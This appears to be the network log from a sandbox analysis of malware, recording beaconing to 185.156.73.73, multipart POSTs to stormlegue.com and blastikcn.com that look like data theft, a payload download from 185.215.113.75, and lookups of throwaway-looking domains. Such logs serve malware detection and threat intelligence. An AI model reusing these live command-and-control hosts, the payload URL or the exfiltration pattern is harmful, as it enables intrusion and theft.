                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:49 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=94
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:51 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=93
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:53 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:55 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:58 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [NL]
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:35:00 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • [US]
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LRW97M5VYDS7NIJ
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1090
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=nohpkcbb7hsp7p1u1mdmf0h82c; expires=Fri, 21 Feb 2025 00:34:43 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqDMsQQfFdbqeKtcnoTZZ%2FpM1Q9asHv5339h80lB%2Bd2dg6HII%2Fy9oL%2BtU0OSK2VIL2uh1cMkasZ7s5EA2Rd8jsEaSJRfmCU65J%2B1fvBNog6v7AoR%2Fw0yH51gkE%2F8%2Fv3sLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a699dfcf994ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44763&min_rtt=42746&rtt_var=11746&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=1787&delivery_rate=78762&cwnd=253&unsent_bytes=0&cid=202265e294ad02fd&ts=296&x=0"
                                                                                            • [US]
                                                                                              DNS
                                                                                              telegram.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              telegram.org
                                                                                              IN A
                                                                                              Response
                                                                                              telegram.org
                                                                                              IN A
                                                                                              149.154.167.99
                                                                                            • [US]
                                                                                              DNS
                                                                                              telegram.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              telegram.org
                                                                                              IN A
                                                                                            • [US]
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 80
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:44 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=mfb4s62mnoi8g9v02s6umb40bm; expires=Fri, 21 Feb 2025 00:34:44 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPf0wsxBQUrBH9P3yUbV81zl8SpgIMeGRgONAcGfxoxVxU7OVu6XZE8GMJZYoSCmLAtYPjcn4PgnAH2nOiTrA40IQ7%2BVY3MId2nify70owJEK393X8MwdZOQE3ozIA7VYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69a059bc3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44635&min_rtt=43247&rtt_var=11694&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=763&delivery_rate=89059&cwnd=253&unsent_bytes=0&cid=73b9d9ed05ae8727&ts=311&x=0"
                                                                                            • [US]
                                                                                              DNS
                                                                                              blastikcn.com
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              Response
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              172.67.192.178
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              104.21.60.59
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqnqUwlUC0gAbNuDENE1WdAA8r%2FKGYc50aJdICTg%2FQtRgP6AAWd1dWCm0WMLAW%2BkTWBDKsbsDAfOH1hUA6%2BJ2PEkEdMlfv00ldGhCztAscxp2yCjVKT%2FunwZ1aVJLZzI"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b0696aed0a-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=cjhrgrvpg215ubat9o82ej7hil; expires=Fri, 21 Feb 2025 00:34:46 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPzAp9kXrQIck%2B6v0q257B%2BnLN59JLffysQhkFuHarwDzBzl9WZMO4OCHo1RtNIX%2F3iL4SFFQWdTnxuQaBCar9XPsdvrSJUAHuOP7NUUCkAcYYugXc6QC4cPdxShKf%2FO"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b0b9dced0a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42275&min_rtt=41731&rtt_var=7375&sent=15&recv=11&lost=0&retrans=0&sent_bytes=8557&recv_bytes=1050&delivery_rate=256977&cwnd=255&unsent_bytes=0&cid=666df8ea788c6b7a&ts=365&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=AECCL0V0N3HJ6UIDMS
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1650
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=6kdpc4crm04cage314a4tifhs5; expires=Fri, 21 Feb 2025 00:34:46 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dFe3sERfkJ6dUe3%2Fh2YN2TKaXdf4%2BB4OZq1gYgckNy%2BU%2BT0re8uAg5eIwAdiFV347J3Z1pjht%2BV1KLOjirSiXafBl6aBzzDGtGNDLhBHgh23dCYUe1fQyxGfB6VKaW5R"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b28c92ed0a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42355&min_rtt=41731&rtt_var=5690&sent=19&recv=15&lost=0&retrans=0&sent_bytes=9722&recv_bytes=3125&delivery_rate=256977&cwnd=255&unsent_bytes=0&cid=666df8ea788c6b7a&ts=552&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=3U9DWLJE
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1040
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=v7m26rv92jvm2q9sj8hvf6qr0d; expires=Fri, 21 Feb 2025 00:34:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVpolfr1xw0ctYYen7TzIMOsDKwZGgOcLuAR7iDaFbGGoxiE2KNLeIyPsnACdgGjOC6A7%2B90V%2FIE5fVq1kIzMojGdFnvu9t48h7peivq4L3Mx4U6vYmk7CSbKbh17hNK"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b4bf747e9f-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44033&min_rtt=43306&rtt_var=13092&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3291&recv_bytes=1728&delivery_rate=94005&cwnd=250&unsent_bytes=0&cid=757365b029266841&ts=303&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=o05c55tgsf9jppu1g78qhsnb58; expires=Fri, 21 Feb 2025 00:34:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCPx0JgJeHrmL8gyAVgkE%2Fx1EasXxOgryZo3SIjj6Al1wZTmi1hJV3BwR%2FQrYfGigE2oCTwTfoZjlX5VDQ0eg%2BL5K8rs%2BskbJ9YBHKKLP7P5pD6U1df1ktUeFsypo6AT"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b7396cef1d-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42269&min_rtt=41450&rtt_var=12385&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3291&recv_bytes=758&delivery_rate=98214&cwnd=253&unsent_bytes=0&cid=87bd10a03d10772d&ts=278&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              byaronia.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              byaronia.com
                                                                                              IN A
                                                                                              Response
                                                                                              byaronia.com
                                                                                              IN A
                                                                                              109.232.216.168
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mail.ru
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mail.ru
                                                                                              IN MX
                                                                                              Response
                                                                                              mail.ru
                                                                                              IN MX
                                                                                              mxs�
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mxs.mail.ru
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mxs.mail.ru
                                                                                              IN A
                                                                                              Response
                                                                                              mxs.mail.ru
                                                                                              IN A
                                                                                              94.100.180.31
                                                                                              mxs.mail.ru
                                                                                              IN A
                                                                                              217.69.139.150
                                                                                            • flag-gb
                                                                                              GET
                                                                                              http://www.google.com/
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:80
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
                                                                                              Accept-Language: en
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:57 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ocab8szP6Bq0lk0vcWVCsA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2fab9v3v5DxPTfgzKuoOfZTAtYjlL50kKDRZPD5rG6Oezbw4v9OVw; expires=Tue, 19-Aug-2025 00:34:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.75/files/unique2/random.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.75:80
                                                                                              Request
                                                                                              GET /files/unique2/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.75
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:53 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 3975168
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:10:37 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b664ed-3ca800"
                                                                                              Accept-Ranges: bytes
• [US] DNS edcatiofireeu.shop; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: edcatiofireeu.shop IN A; response: (none)
• [US] DNS impolitewearr.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: impolitewearr.biz IN A; response: (none)
• [US] DNS toppyneedus.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: toppyneedus.biz IN A; response: (none)
• [US] DNS lightdeerysua.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: lightdeerysua.biz IN A; response: (none)
• [US] DNS suggestyuoz.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: suggestyuoz.biz IN A; response: (none)
• [US] DNS hoursuhouy.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: hoursuhouy.biz IN A; response: (none)
• [US] DNS mixedrecipew.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: mixedrecipew.biz IN A; response: (none)
• [US] DNS affordtempyo.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: affordtempyo.biz IN A; response: (none)
• [US] DNS pleasedcfrown.biz; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: pleasedcfrown.biz IN A; response: (none)
• [US] DNS steamcommunity.com; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: steamcommunity.com IN A; response: steamcommunity.com IN A 104.82.234.109
• [US] DNS steamcommunity.com; process BitLockerToGo.exe; remote address 8.8.8.8:53; request: steamcommunity.com IN A
• [GB] GET https://steamcommunity.com/profiles/76561199724331900; process BitLockerToGo.exe; remote address 104.82.234.109:443
  Request:
  GET /profiles/76561199724331900 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: steamcommunity.com
  Response:
  HTTP/1.1 200 OK
  Server: nginx
  Content-Type: text/html; charset=UTF-8
